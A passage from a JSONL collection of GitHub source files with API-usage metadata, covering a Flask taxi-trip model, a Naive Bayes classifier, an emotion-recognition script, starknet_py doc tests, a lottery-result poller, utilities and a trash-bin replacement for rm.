"ansible.module_utils.gcp_utils.remove_nones_from_dict", "line_number": 642, "usage_type": "call"}, {"api_name": "ansible.module_utils.gcp_utils.replace_resource_dict", "line_number": 646, "usage_type": "call"}, {"api_name": "ansible.module_utils.gcp_utils.remove_nones_from_dict", "line_number": 650, "usage_type": "call"}]} +{"seq_id": "73649840513", "text": "from database import Base\nfrom sqlalchemy import Column, Integer, String, Boolean, ForeignKey, DateTime, Float\nfrom sqlalchemy.types import DateTime\n\n\n\nfrom flask import Flask, request, jsonify, make_response\n\nfrom flask_sqlalchemy import SQLAlchemy\n\napp = Flask(__name__)\napp.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False\n\ndb = SQLAlchemy(app)\n\nclass Medallions(Base):\n\t__tablename__ = 'medallions'\n\t\n\tid = Column(Integer, primary_key=True)\n\tmedallion = Column(String(50))\n\thack_license = Column(String(20))\n\tvendor_id = Column(String(20))\n\trate_code = Column(String(20))\n\tstore_and_fwd_flag = Column(String(20)) \n\tpickup_datetime = Column(DateTime)\n\tdropoff_datetime = Column(DateTime)\n\tpassenger_count = Column(Integer)\n\ttrip_time_in_secs = Column(Integer)\n\ttrip_distance = Column(Float)\n\n", "repo_name": "12DReflections/cab_trips", "sub_path": "models.py", "file_name": "models.py", "file_ext": "py", "file_size_in_byte": 795, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "flask.Flask", "line_number": 11, "usage_type": "call"}, {"api_name": "flask_sqlalchemy.SQLAlchemy", "line_number": 14, "usage_type": "call"}, {"api_name": "database.Base", "line_number": 16, "usage_type": "name"}, {"api_name": "sqlalchemy.Column", "line_number": 19, "usage_type": "call"}, {"api_name": "sqlalchemy.Integer", "line_number": 19, "usage_type": "argument"}, {"api_name": "sqlalchemy.Column", "line_number": 20, "usage_type": "call"}, {"api_name": "sqlalchemy.String", "line_number": 20, "usage_type": "call"}, {"api_name": "sqlalchemy.Column", "line_number": 21, "usage_type": "call"}, {"api_name": "sqlalchemy.String", "line_number": 21, "usage_type": "call"}, {"api_name": "sqlalchemy.Column", "line_number": 22, "usage_type": "call"}, {"api_name": "sqlalchemy.String", "line_number": 22, "usage_type": "call"}, {"api_name": "sqlalchemy.Column", "line_number": 23, "usage_type": "call"}, {"api_name": "sqlalchemy.String", "line_number": 23, "usage_type": "call"}, {"api_name": "sqlalchemy.Column", "line_number": 24, "usage_type": "call"}, {"api_name": "sqlalchemy.String", "line_number": 24, "usage_type": "call"}, {"api_name": "sqlalchemy.Column", "line_number": 25, "usage_type": "call"}, {"api_name": "sqlalchemy.types.DateTime", "line_number": 25, "usage_type": "argument"}, {"api_name": "sqlalchemy.Column", "line_number": 26, "usage_type": "call"}, {"api_name": "sqlalchemy.types.DateTime", "line_number": 26, "usage_type": "argument"}, {"api_name": "sqlalchemy.Column", "line_number": 27, "usage_type": "call"}, {"api_name": "sqlalchemy.Integer", "line_number": 27, "usage_type": "argument"}, {"api_name": "sqlalchemy.Column", "line_number": 28, "usage_type": "call"}, {"api_name": "sqlalchemy.Integer", "line_number": 28, "usage_type": "argument"}, {"api_name": "sqlalchemy.Column", "line_number": 29, "usage_type": "call"}, {"api_name": "sqlalchemy.Float", "line_number": 29, "usage_type": "argument"}]} +{"seq_id": "70423693956", "text": "\"\"\"\nNaiveBayes is a generative classifier based on the Naive assumption that features are independent from each other\nP(w1, w2, ..., wn|y) = P(w1|y) P(w2|y) ... P(wn|y)\nThus argmax_{y} (P(y|w1,w2, ... wn)) can be modeled as argmax_{y} P(w1|y) P(w2|y) ... P(wn|y) P(y) using Bayes Rule\nand P(w1, w2, ... ,wn) is constant with respect to argmax_{y} \nPlease refer to lecture notes Chapter 4 for more details\n\"\"\"\n\nfrom collections import Counter, defaultdict\nfrom math import log\nimport operator\n\nimport numpy as np\nfrom Features import Features, tokenize\nfrom Model import *\n\n\nclass NBFeatures(Features):\n @classmethod \n def get_features(cls, tokenized, model):\n features = []\n token_to_embed = model['token_to_embed']\n for token in tokenized:\n embed = token_to_embed.get(token)\n if embed is not None:\n features.append(embed)\n else:\n features.append(token_to_embed['__OOV__'])\n return features\n\nclass NaiveBayes(Model):\n \n def __init__(self, model_file, vocab_size=None):\n super().__init__(model_file)\n self.vocab_size = vocab_size\n \n \n def train(self, input_file):\n \"\"\"\n This method is used to train your models and generated for a given input_file a trained model\n :param input_file: path to training file with a text and a label per each line\n :return: model: trained model \n \"\"\"\n \n wprobdenom = '__ALL__'\n \n nbFeatures = NBFeatures(input_file, vocab_size=self.vocab_size)\n \n model = {\n 'type': NaiveBayes.__class__,\n 'categories_probs': {},\n 'words_probs': {},\n 'options': nbFeatures.labelset,\n 'token_to_embed': nbFeatures.token_to_embed,\n 'embed_to_token': nbFeatures.embed_to_token,\n 'vocab_size': self.vocab_size,\n\n # 'label_to_embed': nbFeatures.label_to_embed,\n # 'embed_to_label': nbFeatures.embed_to_label,\n }\n \n wscores = defaultdict(lambda: Counter())\n cscores = Counter()\n \n features_list = list(map(lambda x: NBFeatures.get_features(x, model), nbFeatures.tokenized_text))\n # Y_true = list(map(lambda x: model['label_to_embed'][x], nbFeatures.labels))\n \n cutoff = int(len(features_list)*0.9)\n X_train, X_valid = features_list[:cutoff], features_list[cutoff:]\n Y_train, Y_valid = nbFeatures.labels[:cutoff], nbFeatures.labels[cutoff:]\n \n for features, label in zip(X_train, Y_train):\n cscores[label] += 1\n for f in features:\n wscores[label][f] += 1\n wscores[label][wprobdenom] += 1\n \n # Laplace Smoothing (+1)\n for label in model['options']:\n wprob = {}\n for token in nbFeatures.token_to_embed:\n embed = model['token_to_embed'][token]\n wprob[embed] = 1 / (wscores[label][wprobdenom] + 1)\n model['words_probs'][label] = wprob\n \n for label in model['options']:\n model['categories_probs'][label] =\\\n cscores[label] / len(features)\n for feature, score in wscores[label].items():\n # Laplace Smoothing (+1)\n # Overriding vocab values if applicable\n model['words_probs'][label][feature] = (score + 1) / (wscores[label][wprobdenom] + 1)\n \n \n # Validate\n train_err =\\\n np.sum(np.array(self._classify(X_train, model)) != np.array(Y_train))/len(Y_train)\n\n valid_err =\\\n np.sum(np.array(self._classify(X_valid, model)) != np.array(Y_valid))/len(Y_valid)\n \n print(f'TrainErr = {train_err}, ValidErr = {valid_err}', end='\\n')\n \n ## Save the model\n self.save_model(model)\n print('Saved model.')\n return model\n\n\n def _classify(self, features_list, model):\n def evaluate(features, option, model):\n score = log(model['categories_probs'][option])\n for f in features:\n score += log(model['words_probs'][option][f])\n return score \n \n preds = []\n for features in features_list:\n scores = {}\n for option in model['options']:\n scores[option] = evaluate(features, option, model)\n preds.append(\n max(scores.items(), key=operator.itemgetter(1))[0]\n )\n return preds\n \n def classify(self, input_file, model):\n \"\"\"\n This method will be called by us for the validation stage and or you can call it for evaluating your code \n on your own splits on top of the training sets seen to you\n :param input_file: path to input file with a text per line without labels\n :param model: the pretrained model\n :return: predictions list\n \"\"\" \n with open(input_file) as file:\n tokenized_sentences =\\\n map(tokenize, file.read().splitlines())\n\n features_list = list(map(lambda x: NBFeatures.get_features(x, model), tokenized_sentences))\n preds = self._classify(features_list, model) \n return preds\n\n\n", "repo_name": "BasRizk/NaiveBayesVsPerceptronNLP", "sub_path": "naivebayes.py", "file_name": "naivebayes.py", "file_ext": "py", "file_size_in_byte": 5304, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "61", "api": [{"api_name": "Features.Features", "line_number": 18, "usage_type": "name"}, {"api_name": "collections.defaultdict", "line_number": 62, "usage_type": "call"}, {"api_name": "collections.Counter", "line_number": 62, "usage_type": "call"}, {"api_name": "collections.Counter", "line_number": 63, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 97, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 97, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 100, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 100, "usage_type": "call"}, {"api_name": "math.log", "line_number": 112, "usage_type": "call"}, {"api_name": "math.log", "line_number": 114, "usage_type": "call"}, {"api_name": "operator.itemgetter", "line_number": 123, "usage_type": "call"}, {"api_name": "Features.tokenize", "line_number": 137, "usage_type": "argument"}]} +{"seq_id": "5134181261", "text": "# SPDX-License-Identifier: MIT\n# © 2020-2022 ETH Zurich and other contributors, see AUTHORS.txt for details\n\nfrom gdl_apps.EmotionRecognition.utils.io import load_model\nfrom gdl.datasets.ImageTestDataset import TestData\nimport gdl\nimport numpy as np\nimport os\nimport torch\nfrom pathlib import Path\nimport matplotlib.pyplot as plt\nfrom torch.functional import F\nfrom gdl.datasets.AffectNetDataModule import AffectNetExpressions\nfrom gdl.utils.other import get_path_to_assets\nfrom tqdm import tqdm\n\ndef load_dir(lmspath, framepath, start, end):\n lmss = []\n imgs_paths = []\n for i in range(start, end):\n if os.path.isfile(os.path.join(lmspath, str(i) + '.lms')):\n lms = np.loadtxt(os.path.join(\n lmspath, str(i) + '.lms'), dtype=np.float32)\n lmss.append(lms)\n imgs_paths.append(os.path.join(framepath, str(i) + '.jpg'))\n lmss = np.stack(lmss)\n lmss = torch.as_tensor(lmss).cuda()\n return imgs_paths\n\nclass EMOCA_tracker:\n def __init__(self):\n \n model_name = 'ResNet50'\n path_to_models = get_path_to_assets() /\"EmotionRecognition\"\n\n path_to_models = path_to_models / \"image_based_networks\"\n\n self.model = load_model(Path(path_to_models) / model_name)\n print(self.model)\n self.model.cuda()\n self.model.eval()\n\n def __call__(self, images, tform=None):\n\n codedict = self.model(images)\n\n return codedict\n \n def save_images(self, batch, predictions, output_folder):\n # Save the images\n\n softmax = F.softmax(predictions[\"expr_classification\"])\n top_expr = torch.argmax(softmax, dim=1)\n for i in range(len(batch[\"image\"])):\n img = batch[\"image\"][i].cpu().detach().numpy()\n img = img.transpose(1, 2, 0)\n img = img * 255\n img = img.astype(np.uint8)\n\n plt.figure()\n # plot the image with matplotlib \n plt.imshow(img)\n # write valence and arousal to the image\n expr = AffectNetExpressions(int(top_expr[i].item()))\n text = \"Predicted emotion:\\n\"\n text += f'Arousal: {predictions[\"arousal\"][i].item():.2f} \\nValence: {predictions[\"valence\"][i].item():.2f}'\n text += f\"\\nExpression: {expr.name}, {softmax[i][expr.value].item()*100:.2f}%\"\n plt.title(text)\n out_fname = Path(output_folder) / f\"{batch['image_name'][i]}.png\"\n # save the image to the output folder\n \n # axis off \n plt.axis('off')\n plt.savefig(out_fname)\n plt.close()\n\n\ndef emotion_detection(dataset_base, emotion_dir):\n '''\n Face tracker using FLAME model.\n Used to have geometry prior for nerf sampling.\n '''\n\n id_dir = dataset_base\n debug_emotions = os.path.join(id_dir, 'debug', 'emotions_imgs')\n Path(debug_emotions).mkdir(parents=True, exist_ok=True)\n\n emoca_tracker = EMOCA_tracker()\n\n # Run deca on all frames\n testdata = TestData(os.path.join(id_dir, 'frames'), face_detector=\"fan\", max_detection=20)\n \n for i, data in enumerate(tqdm(testdata)):\n batch = testdata[i]\n batch[\"image\"] = batch[\"image\"].cuda()\n predictions = emoca_tracker(batch)\n npy_pred = {k: v.cpu().detach().numpy() for k,v in predictions.items()}\n np.save(os.path.join(emotion_dir, '%5d.npy' % i), npy_pred)\n\n emoca_tracker.save_images(batch, predictions, debug_emotions)\n\nif __name__ == '__main__':\n\n dataset_base = '/media/apennino/EmotionDetection/Test/Greta/'\n emotion_dir = '/media/apennino/EmotionDetection/Test/Greta/emotions/'\n emotion_detection(dataset_base, emotion_dir)\n", "repo_name": "mediatechnologycenter/AvatarForge", "sub_path": "motion-gan-pipeline/preprocessing/emoca_tracker.py", "file_name": "emoca_tracker.py", "file_ext": "py", "file_size_in_byte": 3711, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 3, "dataset": "github-code", "pt": "61", "api": [{"api_name": "os.path.isfile", "line_number": 21, "usage_type": "call"}, {"api_name": "os.path", "line_number": 21, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 21, "usage_type": "call"}, {"api_name": "numpy.loadtxt", "line_number": 22, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 22, "usage_type": "call"}, {"api_name": "os.path", "line_number": 22, "usage_type": "attribute"}, {"api_name": "numpy.float32", "line_number": 23, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 25, "usage_type": "call"}, {"api_name": "os.path", "line_number": 25, "usage_type": "attribute"}, {"api_name": "numpy.stack", "line_number": 26, "usage_type": "call"}, {"api_name": "torch.as_tensor", "line_number": 27, "usage_type": "call"}, {"api_name": "gdl.utils.other.get_path_to_assets", "line_number": 34, "usage_type": "call"}, {"api_name": "gdl_apps.EmotionRecognition.utils.io.load_model", "line_number": 38, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 38, "usage_type": "call"}, {"api_name": "torch.functional.F.softmax", "line_number": 52, "usage_type": "call"}, {"api_name": "torch.functional.F", "line_number": 52, "usage_type": "name"}, {"api_name": "torch.argmax", "line_number": 53, "usage_type": "call"}, {"api_name": "numpy.uint8", "line_number": 58, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 60, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 60, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.imshow", "line_number": 62, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 62, "usage_type": "name"}, {"api_name": "gdl.datasets.AffectNetDataModule.AffectNetExpressions", "line_number": 64, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.title", "line_number": 68, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 68, "usage_type": "name"}, {"api_name": "pathlib.Path", "line_number": 69, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.axis", "line_number": 73, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 73, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 74, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 74, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.close", "line_number": 75, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 75, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 85, "usage_type": "call"}, {"api_name": "os.path", "line_number": 85, "usage_type": "attribute"}, {"api_name": "pathlib.Path", "line_number": 86, "usage_type": "call"}, {"api_name": "gdl.datasets.ImageTestDataset.TestData", "line_number": 91, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 91, "usage_type": "call"}, {"api_name": "os.path", "line_number": 91, "usage_type": "attribute"}, {"api_name": "tqdm.tqdm", "line_number": 93, "usage_type": "call"}, {"api_name": "numpy.save", "line_number": 98, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 98, "usage_type": "call"}, {"api_name": "os.path", "line_number": 98, "usage_type": "attribute"}]} +{"seq_id": "39616804491", "text": "# pylint: disable=unused-variable\nimport pytest\nfrom starkware.starknet.public.abi import (\n get_selector_from_name,\n get_storage_var_address,\n)\n\nfrom starknet_py.net.client_models import Call\nfrom starknet_py.net.full_node_client import FullNodeClient\nfrom starknet_py.net.networks import TESTNET\n\n\ndef test_init():\n # docs-start: init\n full_node_client = FullNodeClient(node_url=\"https://your.node.url\", net=TESTNET)\n # docs-end: init\n\n\n@pytest.mark.asyncio\nasync def test_get_block(full_node_client):\n # docs-start: get_block\n block = await full_node_client.get_block(block_number=\"latest\")\n block = await full_node_client.get_block(block_number=0)\n # or\n block = await full_node_client.get_block(block_hash=\"0x0\")\n # docs-end: get_block\n\n\n@pytest.mark.asyncio\nasync def test_get_state_update(full_node_client):\n # docs-start: get_state_update\n state_update = await full_node_client.get_state_update(block_number=\"latest\")\n state_update = await full_node_client.get_state_update(block_number=0)\n # or\n state_update = await full_node_client.get_state_update(block_hash=\"0x0\")\n # docs-end: get_state_update\n\n\n@pytest.mark.asyncio\nasync def test_get_storage_at(full_node_client, map_contract):\n address = map_contract.address\n # docs-start: get_storage_at\n storage_value = await full_node_client.get_storage_at(\n contract_address=address,\n key=get_storage_var_address(\"storage_var name\"),\n block_number=\"latest\",\n )\n # docs-end: get_storage_at\n\n\n@pytest.mark.asyncio\nasync def test_get_transaction(full_node_client, declare_transaction_hash):\n # docs-start: get_transaction\n transaction_hash = 0x1 or 1 or \"0x1\"\n # docs-end: get_transaction\n transaction_hash = declare_transaction_hash\n # docs-start: get_transaction\n transaction = await full_node_client.get_transaction(tx_hash=transaction_hash)\n # docs-end: get_transaction\n\n\n@pytest.mark.asyncio\nasync def test_get_transaction_receipt(full_node_client, declare_transaction_hash):\n transaction_hash = declare_transaction_hash\n # docs-start: get_transaction_receipt\n transaction_receipt = await full_node_client.get_transaction_receipt(\n tx_hash=transaction_hash\n )\n # docs-end: get_transaction_receipt\n\n\n@pytest.mark.asyncio\nasync def test_estimate_fee(full_node_account, deploy_account_transaction):\n full_node_client = full_node_account.client\n transaction = deploy_account_transaction\n # docs-start: estimate_fee\n estimated_fee = await full_node_client.estimate_fee(tx=transaction)\n # docs-end: estimate_fee\n\n\n@pytest.mark.asyncio\nasync def test_call_contract(full_node_client, contract_address):\n # docs-start: call_contract\n response = await full_node_client.call_contract(\n call=Call(\n to_addr=contract_address,\n selector=get_selector_from_name(\"increase_balance\"),\n calldata=[123],\n ),\n block_number=\"latest\",\n )\n # docs-end: call_contract\n\n\n@pytest.mark.asyncio\nasync def test_get_class_hash_at(full_node_client, contract_address):\n # docs-start: get_class_hash_at\n address = 0x1 or 1 or \"0x1\"\n # docs-end: get_class_hash_at\n address = contract_address\n # docs-start: get_class_hash_at\n class_hash = await full_node_client.get_class_hash_at(\n contract_address=address, block_number=\"latest\"\n )\n # docs-end: get_class_hash_at\n\n\n@pytest.mark.asyncio\nasync def test_get_class_by_hash(full_node_client, class_hash):\n # docs-start: get_class_by_hash\n hash_ = 0x1 or 1 or \"0x1\"\n # docs-end: get_class_by_hash\n hash_ = class_hash\n # docs-start: get_class_by_hash\n contract_class = await full_node_client.get_class_by_hash(class_hash=hash_)\n # docs-end: get_class_by_hash\n\n\n@pytest.mark.asyncio\nasync def test_get_transaction_by_block_id(full_node_client):\n # docs-start: get_transaction_by_block_id\n transaction = await full_node_client.get_transaction_by_block_id(\n index=0, block_number=\"latest\"\n )\n # docs-end: get_transaction_by_block_id\n\n\n@pytest.mark.asyncio\nasync def test_get_block_transaction_count(full_node_client):\n # docs-start: get_block_transaction_count\n num_of_transactions = await full_node_client.get_block_transaction_count(\n block_number=\"latest\"\n )\n # docs-end: get_block_transaction_count\n\n\n@pytest.mark.asyncio\nasync def test_get_class_at(full_node_client, contract_address):\n # docs-start: get_class_at\n address = 0x1 or 1 or \"0x1\"\n # docs-end: get_class_at\n address = contract_address\n # docs-start: get_class_at\n contract_class = await full_node_client.get_class_at(\n contract_address=address, block_number=\"latest\"\n )\n # docs-end: get_class_at\n\n\n@pytest.mark.asyncio\nasync def test_get_contract_nonce(full_node_client, contract_address):\n # docs-start: get_contract_nonce\n address = 0x1 or 1 or \"0x1\"\n # docs-end: get_contract_nonce\n address = contract_address\n # docs-start: get_contract_nonce\n nonce = await full_node_client.get_contract_nonce(\n contract_address=address, block_number=\"latest\"\n )\n # docs-end: get_contract_nonce\n", "repo_name": "chain-cpu/starknet-sdk", "sub_path": "starknet_py/tests/e2e/docs/code_examples/test_full_node_client.py", "file_name": "test_full_node_client.py", "file_ext": "py", "file_size_in_byte": 5175, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "starknet_py.net.full_node_client.FullNodeClient", "line_number": 15, "usage_type": "call"}, {"api_name": "starknet_py.net.networks.TESTNET", "line_number": 15, "usage_type": "name"}, {"api_name": "pytest.mark", "line_number": 19, "usage_type": "attribute"}, {"api_name": "pytest.mark", "line_number": 29, "usage_type": "attribute"}, {"api_name": "starkware.starknet.public.abi.get_storage_var_address", "line_number": 45, "usage_type": "call"}, {"api_name": "pytest.mark", "line_number": 39, "usage_type": "attribute"}, {"api_name": "pytest.mark", "line_number": 51, "usage_type": "attribute"}, {"api_name": "pytest.mark", "line_number": 62, "usage_type": "attribute"}, {"api_name": "pytest.mark", "line_number": 72, "usage_type": "attribute"}, {"api_name": "starknet_py.net.client_models.Call", "line_number": 85, "usage_type": "call"}, {"api_name": "starkware.starknet.public.abi.get_selector_from_name", "line_number": 87, "usage_type": "call"}, {"api_name": "pytest.mark", "line_number": 81, "usage_type": "attribute"}, {"api_name": "pytest.mark", "line_number": 95, "usage_type": "attribute"}, {"api_name": "pytest.mark", "line_number": 108, "usage_type": "attribute"}, {"api_name": "pytest.mark", "line_number": 119, "usage_type": "attribute"}, {"api_name": "pytest.mark", "line_number": 128, "usage_type": "attribute"}, {"api_name": "pytest.mark", "line_number": 137, "usage_type": "attribute"}, {"api_name": "pytest.mark", "line_number": 150, "usage_type": "attribute"}]} +{"seq_id": "33322591725", "text": "# coding=utf-8\n__author__ = 'Feely'\n\nimport time\nimport multiprocessing\nimport sys\n\nimport DrawNO\nimport conn\nimport GDSFC\n\n\nreload(sys)\nsys.setdefaultencoding('utf-8')\nsys.excepthook = lambda *args: None\nSTDERR = sys.stderr\n\n\n#重庆时时彩\ndef ssc_drawnumber(ssc_type,db_ssc_type):\n returndate=''\n while True:\n #调用爬虫,获取开奖信息\n assert isinstance(ssc_type, str)\n draw_date,draw_code, draw_time_str= DrawNO.drawnumber(ssc_type)\n if draw_code == '0' or draw_date <= returndate:\n pass\n else:\n returndate=conn.kjdata(t2=draw_code,cid=db_ssc_type,t1=draw_date,t3=draw_time_str)\n time.sleep(180)\n # draw_time = datetime.strptime(draw_time_str, \"%Y-%m-%d %H:%M\")\n # ms.IsInfoExists(SPname='ibc.dbo.IsInfoExists',lottery_type=db_ssc_type,lottery_num=draw_date,kjCodes=draw_code,kjtime=draw_time,addtime=datetime.now())\n # time.sleep(1)\n # ms.SYSPaiJiang(SPname='ibc.dbo.SYSPaiJiang',kjExpect=draw_date,kjTime=draw_time_str,kjCode=draw_code,ltType=db_ssc_type)\n time.sleep(30)\n\ndef main():\n \"\"\"\n\n :rtype : Null\n \"\"\"\n #重庆时时彩\n ssc_type='cqssc'\n db_ssc_type='1'\n jobs=[]\n for i in range(2):\n p_cq=multiprocessing.Process(name='CQSSC',target=ssc_drawnumber,args=(ssc_type,db_ssc_type,))\n jobs.append(p_cq)\n p_cq.start()\n p_cq.join(timeout=10)\nif __name__ == \"__main__\":\n main()", "repo_name": "FeelySong/SJLottery", "sub_path": "kj/SSC/sjNumber.py", "file_name": "sjNumber.py", "file_ext": "py", "file_size_in_byte": 1460, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "61", "api": [{"api_name": "sys.setdefaultencoding", "line_number": 14, "usage_type": "call"}, {"api_name": "sys.excepthook", "line_number": 15, "usage_type": "attribute"}, {"api_name": "sys.stderr", "line_number": 16, "usage_type": "attribute"}, {"api_name": "DrawNO.drawnumber", "line_number": 25, "usage_type": "call"}, {"api_name": "conn.kjdata", "line_number": 29, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 30, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 35, "usage_type": "call"}, {"api_name": "multiprocessing.Process", "line_number": 47, "usage_type": "call"}]} +{"seq_id": "27922822921", "text": "import os\nimport numpy as np\nimport json\nimport pickle as pkl\nimport matplotlib.pyplot as plt\n\nfrom PIL import Image\nfrom glob import glob\nfrom tqdm import tqdm\n\nfrom c2d_models import *\n\ndef load_json(file):\n if \".json\" not in file: file += \".json\"\n with open(file, \"r\") as f:\n contents = json.load(f)\n return contents\n\ndef dump_json(contents, file):\n if \".json\" not in file: file += \".json\"\n with open(file, \"w\") as f:\n json.dump(contents, f)\n return True\n\ndef load_pickle(file):\n if \".pkl\" not in file: file += \".pkl\"\n with open(file, \"rb\") as f:\n contents = pkl.load(f)\n return contents\n \ndef dump_pickle(contents, file):\n if \".pkl\" not in file: file += \".pkl\"\n with open(file, \"wb\") as f:\n pkl.dump(contents, f)\n return True\n\ndef read_image(image_path, resize_to = None):\n img = Image.open(image_path)\n if resize_to != None:\n img = img.resize(resize_to)\n return np.array(img)\n\ndef save_image(image_array, file_path):\n try:\n image_array = im_to_255(image_array)\n Image.fromarray(image_array).save(file_path)\n return True\n except Exception as e:\n print(e)\n return False\n\ndef join_paths(paths):\n path = \"\"\n for tag in paths:\n path = os.path.join(path, tag)\n return path\n\ndef read_directory_contents(directory):\n if \"*\" not in directory: directory = join_paths([directory, \"*\"])\n return sorted(glob(directory))\n\ndef create_directory(path):\n if not os.path.exists(path): os.mkdir(path)\n \ndef INFO(*list_of_strings):\n list_of_strings = list(list_of_strings)\n print(\"-\"*40)\n print(\"\\n\".join(list_of_strings))\n print(\"-\"*40)\n \ndef normalize(x):\n return (x - x.min())/(x.max() - x.min())\n\ndef im_to_255(x):\n if x.max() <= 1: return (x*255).astype(np.uint8)\n return x\n\ndef get_model(model_path, rec = True, max_value=1000):\n if rec: model = C2D_AE_128_3x3(isTrain = True)\n else: model = C2D_AE_128_3x3(isTrain = False, max_value = max_value)\n model.model.load_weights(model_path)\n return model.model\n\ndef im_3(x, channel_axis = -1):\n if len(x.shape) < 3:\n x = np.expand_dims(x, axis = channel_axis)\n if x.shape[channel_axis] < 3:\n x = x.repeat((1 + 3 - x.shape[channel_axis]), axis = channel_axis)\n return x\n ", "repo_name": "ambareeshravi/AD_AE_XAI", "sub_path": "utils.py", "file_name": "utils.py", "file_ext": "py", "file_size_in_byte": 2326, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "61", "api": [{"api_name": "json.load", "line_number": 16, "usage_type": "call"}, {"api_name": "json.dump", "line_number": 22, "usage_type": "call"}, {"api_name": "pickle.load", "line_number": 28, "usage_type": "call"}, {"api_name": "pickle.dump", "line_number": 34, "usage_type": "call"}, {"api_name": "PIL.Image.open", "line_number": 38, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 38, "usage_type": "name"}, {"api_name": "numpy.array", "line_number": 41, "usage_type": "call"}, {"api_name": "PIL.Image.fromarray", "line_number": 46, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 46, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 55, "usage_type": "call"}, {"api_name": "os.path", "line_number": 55, "usage_type": "attribute"}, {"api_name": "glob.glob", "line_number": 60, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 63, "usage_type": "call"}, {"api_name": "os.path", "line_number": 63, "usage_type": "attribute"}, {"api_name": "os.mkdir", "line_number": 63, "usage_type": "call"}, {"api_name": "numpy.uint8", "line_number": 75, "usage_type": "attribute"}, {"api_name": "numpy.expand_dims", "line_number": 86, "usage_type": "call"}]} +{"seq_id": "35394957031", "text": "import sys\nfrom base import make_app\n\n\nif __name__ == '__main__':\n\toptions = {}\n\tif len(sys.argv) > 1:\n\t\tif sys.argv[1] == 'upgradedb':\n\t\t\tfrom alembic.config import main\n\t\t\tmain('upgrade head'.split(' '), 'alembic')\n\t\n\t\t\texit(0)\n\t\tfor arg in sys.argv[1:]:\n\t\t\tk, v = arg.strip('--').split('=', 1)\n\t\t\toptions[k] = v\n\tapp = make_app(options)\n\tapp.run()\n", "repo_name": "yyotsuba/session_book", "sub_path": "run.py", "file_name": "run.py", "file_ext": "py", "file_size_in_byte": 351, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "sys.argv", "line_number": 7, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 8, "usage_type": "attribute"}, {"api_name": "alembic.config.main", "line_number": 10, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 13, "usage_type": "attribute"}, {"api_name": "base.make_app", "line_number": 16, "usage_type": "call"}]} +{"seq_id": "19233700652", "text": "#!/usr/bin/env python3\n\nimport argparse\nimport os\nimport shutil\n\nTRASH = os.path.expanduser(\"~\") + \"/.trash/\"\n\ndef write_log(trash_path, orig_path):\n with open(TRASH + \"TRASH_LOG.log\", \"a\") as f:\n f.write(TRASH + trash_path + \"\\n\" + orig_path + \"\\n\")\n\n\ndef authenticate_path(file_to_rm):\n file_full = os.path.abspath(file_to_rm)\n file_name = os.path.split(file_full)[-1]\n dest_file_full = file_full\n dest_file_name = file_name\n # same name exists in trash\n if os.path.exists(TRASH + file_name):\n count = 0\n # find which number makes this a unique value\n while (os.path.exists(TRASH + file_name + \".\" + str(count))):\n count += 1\n dest_file_name += \".\" + str(count)\n dest_file_full += \".\" + str(count)\n\n return file_full, dest_file_full, file_name, dest_file_name\n\n\ndef recur(base, perm):\n if perm:\n shutil.rmtree(base)\n else:\n dir_full, dest_dir_full, dir_name, dest_dir_name = authenticate_path(base)\n shutil.move(dir_full, TRASH + dest_dir_name)\n write_log(dest_dir_name, dir_full)\n \n\ndef single(file_to_rm, perm):\n if not os.path.isfile(file_to_rm):\n print(\"Not a regular file!\")\n return\n if perm:\n os.remove(file_to_rm)\n else:\n file_full, dest_file_full, file_name, dest_file_name = authenticate_path(file_to_rm)\n shutil.move(file_full, TRASH + dest_file_name)\n write_log(dest_file_name, file_full)\n \n\n\n\n\ndef clean():\n recur(TRASH, True)\n os.mkdir(TRASH)\n f = open(TRASH + \"TRASH_LOG.log\", \"w+\")\n f.close()\n\n\ndef undo_delete():\n pairs = []\n with open(TRASH + \"TRASH_LOG.log\", \"r\") as log:\n for line in log:\n pairs.append(line.strip())\n\n # make sure there is value to restore\n if len(pairs) < 1:\n print(\"Your trash is empty.\")\n return\n\n # to_restore = [trash, dest]\n to_restore = []\n to_restore.append(pairs[-2])\n to_restore.append(pairs[-1])\n if os.path.exists(to_restore[1]):\n print(\"There will be a name error; 